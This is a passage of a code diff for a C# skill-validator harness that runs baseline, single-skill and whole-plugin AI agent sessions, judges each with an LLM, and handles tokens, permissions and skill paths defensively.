+            PluginImprovementScore = plgComparison.ImprovementScore,
+            Breakdown = isoComparison.ImprovementScore <= plgComparison.ImprovementScore
+                ? isoComparison.Breakdown : plgComparison.Breakdown,
+            IsolatedBreakdown = isoComparison.Breakdown,
+            PluginBreakdown = plgComparison.Breakdown,
+            PairwiseResult = bestPairwise,
+        };
         comparison.PerRunScores = perRunScores;
 
-        // Aggregate skill activation info
-        var allActivations = runResults.Select(r => r.SkillActivation).ToList();
-        comparison.SkillActivation = new SkillActivationInfo(
-            Activated: allActivations.Any(a => a.Activated),
-            DetectedSkills: allActivations.SelectMany(a => a.DetectedSkills).Distinct().ToList(),
-            ExtraTools: allActivations.SelectMany(a => a.ExtraTools).Distinct().ToList(),
-            SkillEventCount: allActivations.Sum(a => a.SkillEventCount));
+        // Aggregate skill activation — BOTH skilled runs independently
+        var allIsoActivations = runResults.Select(r => r.SkillActivationIsolated).ToList();
+        var allPlgActivations = runResults.Select(r => r.SkillActivationPlugin).ToList();
+
+        comparison.SkillActivationIsolated = new SkillActivationInfo(
+            Activated: allIsoActivations.Any(a => a.Activated),
+            DetectedSkills: allIsoActivations.SelectMany(a => a.DetectedSkills).Distinct().ToList(),
+            ExtraTools: allIsoActivations.SelectMany(a => a.ExtraTools).Distinct().ToList(),
+            SkillEventCount: allIsoActivations.Sum(a => a.SkillEventCount));
+
+        comparison.SkillActivationPlugin = new SkillActivationInfo(
+            Activated: allPlgActivations.Any(a => a.Activated),
+            DetectedSkills: allPlgActivations.SelectMany(a => a.DetectedSkills).Distinct().ToList(),
+            ExtraTools: allPlgActivations.SelectMany(a => a.ExtraTools).Distinct().ToList(),
+            SkillEventCount: allPlgActivations.Sum(a => a.SkillEventCount));
 
         // Propagate timeout info from any run
-        comparison.TimedOut = runResults.Any(r => r.WithSkill.Metrics.TimedOut || r.Baseline.Metrics.TimedOut);
+        comparison.TimedOut = runResults.Any(r =>
+            r.Baseline.Metrics.TimedOut ||
+            r.SkilledIsolated.Metrics.TimedOut ||
+            r.SkilledPlugin.Metrics.TimedOut);
 
         // Propagate expect_activation from scenario config
         comparison.ExpectActivation = scenario.ExpectActivation;
@@ -581,9 +668,12 @@ private static async Task<ScenarioComparison> ExecuteScenario(
 
     private sealed record RunExecutionResult(
         RunResult Baseline,
-        RunResult WithSkill,
+        RunResult SkilledIsolated,
+        RunResult SkilledPlugin,
         PairwiseJudgeResult? Pairwise,
-        SkillActivationInfo SkillActivation);
+        bool PairwiseFromPlugin,
+        SkillActivationInfo SkillActivationIsolated,
+        SkillActivationInfo SkillActivationPlugin);
 
     private static async Task<RunExecutionResult> ExecuteRun(
         int runIndex,
@@ -602,81 +692,83 @@ private static async Task<RunExecutionResult> ExecuteRun(
         if (config.Verbose)
             runLog("running agents...");
 
+        var pluginRoot = SkillDiscovery.FindPluginRoot(skill.Path);
+
         var agentTasks = await Task.WhenAll(
-            AgentRunner.RunAgent(new RunOptions(scenario, null, skill.EvalPath, config.Model, config.Verbose, runLog)),
-            AgentRunner.RunAgent(new RunOptions(scenario, skill, skill.EvalPath, config.Model, config.Verbose, runLog)));
+            // 1. Baseline: no plugin, no skills — vanilla agent
+            AgentRunner.RunAgent(new RunOptions(scenario, null, skill.EvalPath, config.Model, config.Verbose,
+                PluginRoot: null, Log: runLog)),
+            // 2. Skilled-isolated: single skill only (current behavior)
+            AgentRunner.RunAgent(new RunOptions(scenario, skill, skill.EvalPath, config.Model, config.Verbose,
+                PluginRoot: null, Log: runLog)),
+            // 3. Skilled-plugin: entire plugin loaded via --plugin-dir
+            AgentRunner.RunAgent(new RunOptions(scenario, skill, skill.EvalPath, config.Model, config.Verbose,
+                PluginRoot: pluginRoot, Log: runLog)));
         var baselineMetrics = agentTasks[0];
-        var withSkillMetrics = agentTasks[1];
+        var isolatedMetrics = agentTasks[1];
+        var pluginMetrics = agentTasks[2];
 
-        // Evaluate assertions
+        // Evaluate assertions on all three runs
         if (scenario.Assertions is { Count: > 0 })
         {
             baselineMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, baselineMetrics.AgentOutput, baselineMetrics.WorkDir);
-            withSkillMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, withSkillMetrics.AgentOutput, withSkillMetrics.WorkDir);
+            isolatedMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, isolatedMetrics.AgentOutput, isolatedMetrics.WorkDir);
+            pluginMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, pluginMetrics.AgentOutput, pluginMetrics.WorkDir);
         }
 
-        // Evaluate constraints
+        // Evaluate constraints on all three runs
         var baselineConstraints = AssertionEvaluator.EvaluateConstraints(scenario, baselineMetrics);
-        var withSkillConstraints = AssertionEvaluator.EvaluateConstraints(scenario, withSkillMetrics);
+        var isolatedConstraints = AssertionEvaluator.EvaluateConstraints(scenario, isolatedMetrics);
+        var pluginConstraints = AssertionEvaluator.EvaluateConstraints(scenario, pluginMetrics);
         baselineMetrics.AssertionResults = [..baselineMetrics.AssertionResults, ..baselineConstraints];
-        withSkillMetrics.AssertionResults = [..withSkillMetrics.AssertionResults, ..withSkillConstraints];
+        isolatedMetrics.AssertionResults = [..isolatedMetrics.AssertionResults, ..isolatedConstraints];
+        pluginMetrics.AssertionResults = [..pluginMetrics.AssertionResults, ..pluginConstraints];
 
-        // Task completion
+        // Task completion for all three
         if (scenario.Assertions is { Count: > 0 } || baselineConstraints.Count > 0)
         {
             baselineMetrics.TaskCompleted = baselineMetrics.AssertionResults.All(a => a.Passed);
-            withSkillMetrics.TaskCompleted = withSkillMetrics.AssertionResults.All(a => a.Passed);
+            isolatedMetrics.TaskCompleted = isolatedMetrics.AssertionResults.All(a => a.Passed);
+            pluginMetrics.TaskCompleted = pluginMetrics.AssertionResults.All(a => a.Passed);
         }
         else
         {
             baselineMetrics.TaskCompleted = baselineMetrics.ErrorCount == 0;
-            withSkillMetrics.TaskCompleted = withSkillMetrics.ErrorCount == 0;
+            isolatedMetrics.TaskCompleted = isolatedMetrics.ErrorCount == 0;
+            pluginMetrics.TaskCompleted = pluginMetrics.ErrorCount == 0;
         }
 
-        // Judge — failures are non-fatal so a single timeout doesn't kill the whole evaluation.
-        // Await each judge independently so a failure in one doesn't discard the other's result.
+        // Judge all three runs independently (failures are non-fatal)
         var judgeOpts = new JudgeOptions(config.JudgeModel, config.Verbose, config.JudgeTimeout, baselineMetrics.WorkDir, skill.Path);
 
         var baselineJudgeTask = Services.Judge.JudgeRun(scenario, baselineMetrics, judgeOpts, runLog);
-        var withSkillJudgeTask = Services.Judge.JudgeRun(
-            scenario, withSkillMetrics, judgeOpts with { WorkDir = withSkillMetrics.WorkDir }, runLog);
-
-        JudgeResult baselineJudge;
-        try
-        {
-            baselineJudge = await baselineJudgeTask;
-        }
-        catch (Exception error)
-        {
-            var shortMsg = SanitizeErrorMessage(error.Message);
-            runLog($"\x1b[33m⚠️  Judge (baseline) failed, using fallback scores: {shortMsg}\x1b[0m");
-            baselineJudge = new JudgeResult([], 3, $"Judge failed: {shortMsg}");
-        }
+        var isolatedJudgeTask = Services.Judge.JudgeRun(
+            scenario, isolatedMetrics, judgeOpts with { WorkDir = isolatedMetrics.WorkDir }, runLog);
+        var pluginJudgeTask = Services.Judge.JudgeRun(
+            scenario, pluginMetrics, judgeOpts with { WorkDir = pluginMetrics.WorkDir }, runLog);
 
-        JudgeResult withSkillJudge;
-        try
-        {
-            withSkillJudge = await withSkillJudgeTask;
-        }
-        catch (Exception error)
-        {
-            var shortMsg = SanitizeErrorMessage(error.Message);
-            runLog($"\x1b[33m⚠️  Judge (with skill) failed, using fallback scores: {shortMsg}\x1b[0m");
-            withSkillJudge = new JudgeResult([], 3, $"Judge failed: {shortMsg}");
-        }
+        var baselineJudge = await SafeJudge(baselineJudgeTask, "baseline", runLog);
+        var isolatedJudge = await SafeJudge(isolatedJudgeTask, "isolated", runLog);
+        var pluginJudge = await SafeJudge(pluginJudgeTask, "plugin", runLog);
 
-        var baseline = new RunResult(baselineMetrics, baselineJudge);
-        var withSkillResult = new RunResult(withSkillMetrics, withSkillJudge);
+        var baselineResult = new RunResult(baselineMetrics, baselineJudge);
+        var isolatedResult = new RunResult(isolatedMetrics, isolatedJudge);
+        var pluginResult = new RunResult(pluginMetrics, pluginJudge);
 
-        // Pairwise judging
+        // Pairwise judging — compare baseline vs worse-scoring skilled run
+        // Track which run the pairwise result corresponds to.
         PairwiseJudgeResult? pairwise = null;
+        bool pairwiseFromPlugin = false;
         if (usePairwise)
         {
+            pairwiseFromPlugin = pluginJudge.OverallScore < isolatedJudge.OverallScore;
+            var worseSkilled = pairwiseFromPlugin
+                ? pluginMetrics : isolatedMetrics;
             try
             {
                 pairwise = await Services.PairwiseJudge.Judge(
-                    scenario, baselineMetrics, withSkillMetrics,
-                    new PairwiseJudgeOptions(config.JudgeModel, config.Verbose, config.JudgeTimeout, baselineMetrics.WorkDir, skill.Path, withSkillMetrics.WorkDir),
+                    scenario, baselineMetrics, worseSkilled,
+                    new PairwiseJudgeOptions(config.JudgeModel, config.Verbose, config.JudgeTimeout, baselineMetrics.WorkDir, skill.Path, worseSkilled.WorkDir),
                     runLog);
             }
             catch (Exception error)
@@ -685,25 +777,40 @@ private static async Task<RunExecutionResult> ExecuteRun(
             }
         }
 
-        // Skill activation
-        var skillActivation = MetricsCollector.ExtractSkillActivation(withSkillMetrics.Events, baselineMetrics.ToolCallBreakdown);
+        // Skill activation — check both skilled runs independently
+        // Pass the target skill name so that in plugin runs only the skill under
+        // test counts towards activation (prevents sibling-skill false positives).
+        var isolatedActivation = MetricsCollector.ExtractSkillActivation(
+            isolatedMetrics.Events, baselineMetrics.ToolCallBreakdown, skill.Name);
+        var pluginActivation = MetricsCollector.ExtractSkillActivation(
+            pluginMetrics.Events, baselineMetrics.ToolCallBreakdown, skill.Name);
+
+        runLog(isolatedActivation.Activated
+            ? $"🔌 Skill activated (isolated): skills={string.Join(", ", isolatedActivation.DetectedSkills)}"
+            : "⚠️  Skill NOT activated (isolated)");
+        runLog(pluginActivation.Activated
+            ? $"🔌 Skill activated (plugin): skills={string.Join(", ", pluginActivation.DetectedSkills)}"
+            : "⚠️  Skill NOT activated (plugin)");
+
+        if (config.Verbose)
+            runLog("✓ complete");
+
+        return new RunExecutionResult(baselineResult, isolatedResult, pluginResult, pairwise,
+            pairwiseFromPlugin, isolatedActivation, pluginActivation);
+    }
 
-        if (skillActivation.Activated)
+    private static async Task<JudgeResult> SafeJudge(Task<JudgeResult> task, string label, Action<string> runLog)
+    {
+        try
         {
-            var parts = new List<string>();
-            if (skillActivation.DetectedSkills.Count > 0) parts.Add($"skills: {string.Join(", ", skillActivation.DetectedSkills)}");
-            if (skillActivation.ExtraTools.Count > 0) parts.Add($"extra tools: {string.Join(", ", skillActivation.ExtraTools)}");
-            runLog($"🔌 Skill activated ({string.Join("; ", parts)})");
+            return await task;
         }
-        else
+        catch (Exception error)
         {
-            runLog("\x1b[33m⚠️  Skill was NOT activated during this run\x1b[0m");
+            var shortMsg = SanitizeErrorMessage(error.Message);
+            runLog($"\x1b[33m⚠️  Judge ({label}) failed, using fallback scores: {shortMsg}\x1b[0m");
+            return new JudgeResult([], 3, $"Judge failed: {shortMsg}");
         }
-
-        if (config.Verbose)
-            runLog("✓ complete");
-
-        return new RunExecutionResult(baseline, withSkillResult, pairwise, skillActivation);
     }
 
     // --- Noise-only evaluation: skill-only vs all-skills (no pure-agent baseline) ---
@@ -807,11 +914,11 @@ private static async Task<NoiseTestResult> ExecuteNoiseTest(
                     {
                         // Run with target skill only
                         var skillOnlyMetrics = await AgentRunner.RunAgent(new RunOptions(
-                            scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, scenarioLog));
+                            scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, Log: scenarioLog));
 
                         // Run with all skills loaded
                         var allSkillsMetrics = await AgentRunner.RunAgent(new RunOptions(
-                            scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, scenarioLog, AdditionalSkills: otherSkills));
+                            scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, Log: scenarioLog, AdditionalSkills: otherSkills));
 
                         // Evaluate assertions on both
                         if (scenario.Assertions is { Count: > 0 })
diff --git a/eng/skill-validator/src/Models/Models.cs b/eng/skill-validator/src/Models/Models.cs
index 2374b7f60d..83e0223793 100644
--- a/eng/skill-validator/src/Models/Models.cs
+++ b/eng/skill-validator/src/Models/Models.cs
@@ -230,15 +230,29 @@ public sealed class ScenarioComparison
 {
     public required string ScenarioName { get; init; }
     public required RunResult Baseline { get; init; }
-    public required RunResult WithSkill { get; init; }
+    public RunResult SkilledIsolated { get; init; } = null!;
+    public RunResult? SkilledPlugin { get; init; }
     public required double ImprovementScore { get; init; }
+    public double IsolatedImprovementScore { get; init; }
+    public double PluginImprovementScore { get; init; }
     public required MetricBreakdown Breakdown { get; init; }
+    public MetricBreakdown? IsolatedBreakdown { get; init; }
+    public MetricBreakdown? PluginBreakdown { get; init; }
     public PairwiseJudgeResult? PairwiseResult { get; init; }
     public IReadOnlyList<double>? PerRunScores { get; set; }
-    public SkillActivationInfo? SkillActivation { get; set; }
+    public SkillActivationInfo? SkillActivationIsolated { get; set; }
+    public SkillActivationInfo? SkillActivationPlugin { get; set; }
     public bool TimedOut { get; set; }
     /// <summary>When false, non-activation is expected (negative test) and should not flag the verdict.</summary>
     public bool ExpectActivation { get; set; } = true;
+
+    // Backward-compatible aliases for JSON deserialization of older results files.
+    // These must be settable (init) so System.Text.Json can populate them during
+    // deserialization of legacy JSON that uses the old property names.
+    [JsonPropertyName("withSkill")]
+    public RunResult WithSkill { get => SkilledIsolated; init => SkilledIsolated = value; }
+    [JsonPropertyName("skillActivation")]
+    public SkillActivationInfo? SkillActivation { get => SkillActivationIsolated; init => SkillActivationIsolated = value; }
 }
 
 // --- Verdict ---
@@ -253,6 +267,8 @@ public sealed class SkillVerdict
     public double? NormalizedGain { get; init; }
     public ConfidenceInterval? ConfidenceInterval { get; init; }
     public bool? IsSignificant { get; init; }
+    public double? IsolatedScore { get; set; }
+    public double? PluginScore { get; set; }
     public required string Reason { get; set; }
     /// <summary>Categorizes why the verdict failed, if it did.</summary>
     public string? FailureKind { get; set; }
diff --git a/eng/skill-validator/src/Services/AgentRunner.cs b/eng/skill-validator/src/Services/AgentRunner.cs
index aef38084d3..058b17b717 100644
--- a/eng/skill-validator/src/Services/AgentRunner.cs
+++ b/eng/skill-validator/src/Services/AgentRunner.cs
@@ -14,46 +14,66 @@ public sealed record RunOptions(
     string? EvalPath,
     string Model,
     bool Verbose,
+    string? PluginRoot = null,
     Action<string>? Log = null,
     IReadOnlyList<SkillInfo>? AdditionalSkills = null);
 
 public static class AgentRunner
 {
-    private static CopilotClient? _sharedClient;
+    private static readonly ConcurrentDictionary<string, CopilotClient> _pluginClients = new(StringComparer.OrdinalIgnoreCase);
     private static readonly SemaphoreSlim _clientLock = new(1, 1);
     private static readonly ConcurrentBag<string> _workDirs = [];
+    private static string? _capturedGitHubToken;
+    private static bool _tokenCaptured;
 
     /// <summary>
-    /// Returns the shared <see cref="CopilotClient"/>, creating it on first call.
-    /// Must be called before executing any untrusted workloads (eval scenarios,
-    /// setup commands).
+    /// Capture GITHUB_TOKEN once at startup so multiple clients can share it
+    /// and the env var is cleared from child processes.
     /// </summary>
-    public static async Task<CopilotClient> GetSharedClient(bool verbose)
+    public static void CaptureGitHubToken()
     {
-        if (_sharedClient is not null) return _sharedClient;
+        if (_tokenCaptured) return;
+        _capturedGitHubToken = Environment.GetEnvironmentVariable("GITHUB_TOKEN");
+        if (!string.IsNullOrEmpty(_capturedGitHubToken))
+            Environment.SetEnvironmentVariable("GITHUB_TOKEN", null);
+        _tokenCaptured = true;
+    }
+
+    /// <summary>
+    /// Returns a CopilotClient configured for the given plugin.
+    /// The client is created once per plugin root and reused.
+    /// Note: --plugin-dir is NOT honored by the SDK, so all clients share
+    /// the same configuration. Plugin skills are loaded manually via
+    /// SkillDirectories in BuildSessionConfig instead.
+    /// </summary>
+    public static async Task<CopilotClient> GetPluginClient(
+        string? pluginRoot, bool verbose)
+    {
+        var key = pluginRoot ?? "";
+
+        if (_pluginClients.TryGetValue(key, out var existing))
+            return existing;
 
         await _clientLock.WaitAsync();
         try
         {
-            if (_sharedClient is not null) return _sharedClient;
+            if (_pluginClients.TryGetValue(key, out existing))
+                return existing;
+
+            CaptureGitHubToken();
 
             var options = new CopilotClientOptions
             {
                 LogLevel = verbose ? "info" : "none",
             };
 
-            var githubToken = Environment.GetEnvironmentVariable("GITHUB_TOKEN");
-            if (!string.IsNullOrEmpty(githubToken))
-            {
-                options.GitHubToken = githubToken;
-                // Clear the token from the environment so child processes
-                // (e.g. LLM-generated code, eval shell commands) cannot read it.
-                Environment.SetEnvironmentVariable("GITHUB_TOKEN", null);
-            }
+            if (!string.IsNullOrEmpty(_capturedGitHubToken))
+                options.GitHubToken = _capturedGitHubToken;
 
-            _sharedClient = new CopilotClient(options);
-            await _sharedClient.StartAsync();
-            return _sharedClient;
+            var client = new CopilotClient(options);
+            await client.StartAsync();
+            _pluginClients[key] = client;
+            return client;
         }
         finally
         {
@@ -61,15 +81,27 @@ public static async Task<CopilotClient> GetSharedClient(bool verbose)
         }
     }
 
-    public static async Task StopSharedClient()
+    /// <summary>
+    /// Backward-compatible alias — returns the no-plugin client.
+    /// Used by judge sessions that don't need plugin loading.
+    /// </summary>
+    public static Task<CopilotClient> GetSharedClient(bool verbose)
+        => GetPluginClient(null, verbose);
+
+    /// <summary>Stop all plugin clients (including the no-plugin client).</summary>
+    public static async Task StopAllClients()
     {
-        if (_sharedClient is not null)
+        foreach (var (_, client) in _pluginClients)
         {
-            await _sharedClient.StopAsync();
-            _sharedClient = null;
+            try { await client.StopAsync(); }
+            catch { /* best effort */ }
         }
+        _pluginClients.Clear();
     }
 
+    /// <summary>Backward-compatible alias.</summary>
+    public static Task StopSharedClient() => StopAllClients();
+
     /// <summary>Remove all temporary working directories created during runs.</summary>
     public static Task CleanupWorkDirs()
     {
@@ -82,7 +114,7 @@ public static Task CleanupWorkDirs()
         }));
     }
 
-    public static bool CheckPermission(PermissionRequest request, string workDir, string? skillPath, Action<string>? log, string? runLabel = null, IReadOnlyList<string>? additionalAllowedDirs = null)
+    public static bool CheckPermission(PermissionRequest request, string workDir, string? skillPath, Action<string>? log, string? runLabel = null, string? pluginRoot = null, IReadOnlyList<string>? additionalAllowedDirs = null)
     {
         string? reqPath = null;
         if (request.ExtensionData is { } data)
@@ -125,6 +157,14 @@ public static bool CheckPermission(PermissionRequest request, string workDir, st
 
             allowedDirs.Add(skillsPathAbsolute);
         }
+        if (pluginRoot is not null)
+        {
+            string pluginRootAbsolute = Path.GetFullPath(pluginRoot);
+            if (!Path.EndsInDirectorySeparator(pluginRootAbsolute))
+                pluginRootAbsolute = pluginRootAbsolute + Path.DirectorySeparatorChar;
+
+            allowedDirs.Add(pluginRootAbsolute);
+        }
 
         if (additionalAllowedDirs is not null)
         {
@@ -161,6 +201,7 @@ public static bool CheckPermission(PermissionRequest request, string workDir, st
 
     internal static SessionConfig BuildSessionConfig(
         SkillInfo? skill,
+        string? pluginRoot,
         string model,
         string workDir,
         IReadOnlyDictionary<string, MCPServerDef>? mcpServers = null,
@@ -179,12 +220,11 @@ internal static SessionConfig BuildSessionConfig(
         if (verbose)
             log?.Invoke($"      📂 Config dir: {configDir} ({(skill is not null ? "skilled" : "baseline")})");
 
-        // Build skill directories list: primary skill + any additional skills.
+        // Build additional noise skill directories when noise testing is active.
         // For additional skills we stage a temp directory with copies of each
         // skill's SKILL.md so the SDK discovers exactly those skills — not
         // every sibling that happens to share the same parent directory.
-        var skillDirs = new List<string>();
-        if (skillPath is not null) skillDirs.Add(skillPath);
+        var noiseDirs = new List<string>();
         if (additionalSkills is { Count: > 0 })
         {
             var stageDir = Path.Combine(Path.GetTempPath(), $"sv-noise-{Guid.NewGuid():N}");
@@ -202,10 +242,11 @@ internal static SessionConfig BuildSessionConfig(
                 File.Copy(skillMdPath, Path.Combine(stagedSkillDir, "SKILL.md"));
             }
 
-            skillDirs.Add(stageDir);
+            noiseDirs.Add(stageDir);
         }
 
         // Convert MCPServerDef records to the SDK's Dictionary<string, object> shape
+        // Security hardening: validate commands, sanitize args/env, drop custom cwd.
         Dictionary<string, object>? sdkMcp = null;
         if (mcpServers is { Count: > 0 })
         {
@@ -247,19 +288,41 @@ internal static SessionConfig BuildSessionConfig(
             if (sdkMcp.Count == 0) sdkMcp = null;
         }
 
+        // Three run types:
+        // 1. Baseline (skill == null, pluginRoot == null): no skills, no MCP.
+        // 2. Skilled-isolated (skill != null, pluginRoot == null): single skill via SkillDirectories.
+        // 3. Skilled-plugin (skill != null, pluginRoot != null): entire plugin loaded manually
+        //    via SkillDirectories (--plugin-dir is NOT honored by SDK).
+        //
+        // For skilled-plugin, we enumerate all skill directories from plugin.json
+        // so that all sibling skills are loaded, matching production behavior.
+        string[] skillDirs;
+        if (pluginRoot is not null)
+        {
+            skillDirs = ResolvePluginSkillDirectories(pluginRoot);
+        }
+        else if (skill is not null)
+        {
+            skillDirs = [skillPath!];
+        }
+        else
+        {
+            skillDirs = [];
+        }
+
         return new SessionConfig
         {
             Model = model,
             Streaming = true,
             WorkingDirectory = workDir,
-            SkillDirectories = skillDirs,
+            SkillDirectories = [..skillDirs, ..noiseDirs],
             ConfigDir = configDir,
             McpServers = sdkMcp,
             InfiniteSessions = new InfiniteSessionConfig { Enabled = false },
             OnPermissionRequest = (request, _) =>
             {
                 var runLabel = skill is not null ? "skilled" : "baseline";
-                var result = CheckPermission(request, workDir, skillPath, verbose ? log : null, runLabel);
+                var result = CheckPermission(request, workDir, skillPath, verbose ? log : null, runLabel, pluginRoot);
                 return Task.FromResult(new PermissionRequestResult
                 {
                     Kind = result ? PermissionRequestResultKind.Approved : PermissionRequestResultKind.DeniedByRules,
@@ -268,11 +331,44 @@ internal static SessionConfig BuildSessionConfig(
         };
     }
 
+    /// <summary>
+    /// Resolves the skill directories for a plugin by reading its plugin.json
+    /// and returning the resolved skills path. The SDK scans this directory
+    /// for subdirectories containing SKILL.md files.
+    /// </summary>
+    internal static string[] ResolvePluginSkillDirectories(string pluginRoot)
+    {
+        var pluginJsonPath = Path.Combine(pluginRoot, "plugin.json");
+        PluginInfo? pluginInfo;
+        try
+        {
+            pluginInfo = PluginValidator.ParsePluginJson(pluginJsonPath);
+        }
+        catch (JsonException)
+        {
+            // Malformed plugin.json — return empty so the session is created
+            // without extra skill directories; validation surfaces the real error.
+            return [];
+        }
+        if (pluginInfo?.SkillsPath is null) return [];
+
+        if (!PluginValidator.TryGetSafeSubdirectory(
+                pluginRoot, pluginInfo.SkillsPath, out var skillsDir, out _))
+            return [];
+
+        if (!Directory.Exists(skillsDir!)) return [];
+
+        return [skillsDir!];
+    }
+
     public static async Task<RunMetrics> RunAgent(RunOptions options)
     {
+        var runType = options.Skill is null ? "baseline"
+            : options.PluginRoot is not null ? "skilled-plugin"
+            : "skilled-isolated";
         return await RetryHelper.ExecuteWithRetry(
             async ct => await RunAgentCore(options, ct),
-            label: $"RunAgent({options.Scenario.Name}, {(options.Skill is not null ? "skilled" : "baseline")})",
+            label: $"RunAgent({options.Scenario.Name}, {runType})",
             maxRetries: 2,
             baseDelayMs: 5_000,
             totalTimeoutMs: (options.Scenario.Timeout + 60) * 1000);
@@ -294,10 +390,12 @@ private static async Task<RunMetrics> RunAgentCore(RunOptions options, Cancellat
 
         try
         {
+            // All runs use the shared client — plugin skills are loaded manually
+            // via SkillDirectories (--plugin-dir is not honored by SDK).
             var client = await GetSharedClient(options.Verbose);
 
             await using var session = await client.CreateSessionAsync(
-                BuildSessionConfig(options.Skill, options.Model, workDir, options.Skill?.McpServers, options.AdditionalSkills, options.Log, options.Verbose));
+                BuildSessionConfig(options.Skill, options.PluginRoot, options.Model, workDir, options.Skill?.McpServers, options.AdditionalSkills, options.Log, options.Verbose));
 
             var done = new TaskCompletionSource();
             var effectiveTimeout = options.Scenario.Timeout;
diff --git a/eng/skill-validator/src/Services/Comparator.cs b/eng/skill-validator/src/Services/Comparator.cs
index fa1aaff775..70f6cb8fd1 100644
--- a/eng/skill-validator/src/Services/Comparator.cs
+++ b/eng/skill-validator/src/Services/Comparator.cs
@@ -54,9 +54,12 @@ public static ScenarioComparison CompareScenario(
         {
             ScenarioName = scenarioName,
             Baseline = baseline,
-            WithSkill = withSkill,
+            SkilledIsolated = withSkill,
+            SkilledPlugin = null,
             ImprovementScore = improvementScore,
+            IsolatedImprovementScore = improvementScore,
             Breakdown = breakdown,
+            IsolatedBreakdown = breakdown,
             PairwiseResult = pairwiseResult,
         };
     }
@@ -95,7 +98,8 @@ public static SkillVerdict ComputeVerdict(
         if (requireCompletion)
         {
             bool regressed = comparisons.Any(c =>
-                c.Baseline.Metrics.TaskCompleted && !c.WithSkill.Metrics.TaskCompleted);
+                c.Baseline.Metrics.TaskCompleted &&
+                (!c.SkilledIsolated.Metrics.TaskCompleted || (c.SkilledPlugin is not null && !c.SkilledPlugin.Metrics.TaskCompleted)));
             if (regressed)
             {
                 return new SkillVerdict
@@ -133,6 +137,8 @@ public static SkillVerdict ComputeVerdict(
             NormalizedGain = normalizedGain,
             ConfidenceInterval = ci,
             IsSignificant = significant,
+            IsolatedScore = comparisons.Average(c => c.IsolatedImprovementScore),
+            PluginScore = comparisons.Average(c => c.PluginImprovementScore),
             Reason = reason,
             FailureKind = passed ? null : "threshold",
         };
@@ -170,7 +176,15 @@ private static double ComputeNormalizedGain(IReadOnlyList<ScenarioComparison> co
         foreach (var c in comparisons)
         {
             double pre = (c.Baseline.JudgeResult.OverallScore - 1) / 4.0;
-            double post = (c.WithSkill.JudgeResult.OverallScore - 1) / 4.0;
+            // Select the effective run based on the worse (lower) improvement score,
+            // then use that run's overall score so this aligns with the effective
+            // comparison used for pass/fail and reporting.
+            double effectiveScore;
+            if (c.SkilledPlugin is not null && c.PluginImprovementScore < c.IsolatedImprovementScore)
+                effectiveScore = c.SkilledPlugin.JudgeResult.OverallScore;
+            else
+                effectiveScore = c.SkilledIsolated.JudgeResult.OverallScore;
+            double post = (effectiveScore - 1) / 4.0;
 
             if (pre >= 1)
                 totalGain += post >= pre ? 0 : post - pre;
diff --git a/eng/skill-validator/src/Services/MetricsCollector.cs b/eng/skill-validator/src/Services/MetricsCollector.cs
index 3ebc0eb0e8..b0c6927806 100644
--- a/eng/skill-validator/src/Services/MetricsCollector.cs
+++ b/eng/skill-validator/src/Services/MetricsCollector.cs
@@ -7,10 +7,14 @@ public static class MetricsCollector
 {
     /// <summary>
     /// Analyse events from a "with-skill" run to determine whether the skill was activated.
+    /// When <paramref name="targetSkillName"/> is set, only counts as "Activated" if the
+    /// target skill was specifically detected — prevents false positives in plugin runs
+    /// where sibling skills may fire instead of the skill under test.
     /// </summary>
     public static SkillActivationInfo ExtractSkillActivation(
         IReadOnlyList<AgentEvent> skilledEvents,
-        Dictionary<string, int> baselineToolBreakdown)
+        Dictionary<string, int> baselineToolBreakdown,
+        string? targetSkillName = null)
     {
         var detectedSkills = new List<string>();
         int skillEventCount = 0;
@@ -44,8 +48,18 @@ public static SkillActivationInfo ExtractSkillActivation(
             .Where(tool => !baselineToolBreakdown.ContainsKey(tool))
             .ToList();
 
+        // When targetSkillName is set, activation is determined solely by whether
+        // the target skill was specifically detected (case-insensitive). ExtraTools
+        // and sibling skill names are still populated for diagnostic purposes but
+        // do NOT contribute to the Activated flag — we control the SDK and it always
+        // emits SkillInvokedEvent when a skill is loaded.
+        bool activated = targetSkillName is null
+            ? skillEventCount > 0 || extraTools.Count > 0
+            : detectedSkills.Any(s =>
+                s.Equals(targetSkillName, StringComparison.OrdinalIgnoreCase));
+
         return new SkillActivationInfo(
-            Activated: skillEventCount > 0 || extraTools.Count > 0,
+            Activated: activated,
             DetectedSkills: detectedSkills,
             ExtraTools: extraTools,
             SkillEventCount: skillEventCount);
diff --git a/eng/skill-validator/src/Services/PairwiseJudge.cs b/eng/skill-validator/src/Services/PairwiseJudge.cs
index 246822032b..4913412702 100644
--- a/eng/skill-validator/src/Services/PairwiseJudge.cs
+++ b/eng/skill-validator/src/Services/PairwiseJudge.cs
@@ -87,7 +87,7 @@ private static async Task<PairwiseJudgeResult> JudgeCall(
             OnPermissionRequest = (request, _) =>
             {
                 var extraDirs = options.SkilledWorkDir is not null ? new[] { options.SkilledWorkDir } : null;
-                var result = AgentRunner.CheckPermission(request, options.WorkDir, options.SkillPath, options.Verbose ? log : null, "pairwise-judge", extraDirs);
+                var result = AgentRunner.CheckPermission(request, options.WorkDir, options.SkillPath, options.Verbose ? log : null, "pairwise-judge", additionalAllowedDirs: extraDirs);
                 return Task.FromResult(new PermissionRequestResult
                 {
                     Kind = result ? PermissionRequestResultKind.Approved : PermissionRequestResultKind.DeniedByRules,
diff --git a/eng/skill-validator/src/Services/Reporter.cs b/eng/skill-validator/src/Services/Reporter.cs
index 47e40a5119..f8ab8f95db 100644
--- a/eng/skill-validator/src/Services/Reporter.cs
+++ b/eng/skill-validator/src/Services/Reporter.cs
@@ -170,7 +170,7 @@ private static void ReportConsole(IReadOnlyList<SkillVerdict> verdicts, bool ver
         Console.WriteLine($"{summaryColor}{summaryText}\x1b[0m");
 
         bool anyTimeout = verdicts.Any(v => v.Scenarios.Any(s =>
-            s.Baseline.Metrics.TimedOut || s.WithSkill.Metrics.TimedOut));
+            s.Baseline.Metrics.TimedOut || s.SkilledIsolated.Metrics.TimedOut || (s.SkilledPlugin?.Metrics.TimedOut == true)));
         if (anyTimeout)
         {
